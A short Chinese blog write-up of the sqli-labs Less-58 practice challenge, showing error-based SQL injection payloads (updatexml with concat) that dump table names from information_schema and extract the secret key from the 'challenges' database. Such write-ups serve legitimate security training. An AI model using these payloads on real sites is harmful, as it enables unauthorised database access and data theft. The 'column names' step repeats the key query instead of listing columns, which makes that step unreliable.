sqli-labs-Less-58

张开发
2026/4/18 23:24:02 15 分钟阅读

分享文章

sqli-labs-Less-58
SQLI-LAPS 实验记录Less-58这一关通过提示信息可以知道只有5次尝试的机会且数据库明确为“challenges”所以我们通过联合注入与报错注入的尝试最终发现报错注入可以通过本关。根据之前的经验首先我们在命令行中采用单引号来闭合使用报错注入命令?id1’andupdatexml(1,concat(0x7e,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schemachallenges),0x7e),1)--结果如图所示能够爆出表名I9N6HQ4FTF。接下来我们继续使用该语句来进行注入爆出数列名以及秘钥语句如下查询列名?id1andupdatexml(1,concat(0x7e,(selectgroup_concat(secret_RYTP)from challenges.I9N6HQ4FTF),0x7e),1)--查询结果为secret_RYTP查询秘钥?id1 and updatexml(1,concat(0x7e,(select group_concat(secret_RYTP) from challenges.I9N6HQ4FTF),0x7e),1) --查询如图所示。之后将查询出的密钥输入页面下方的对话框中就可以看到成功信息了。

更多文章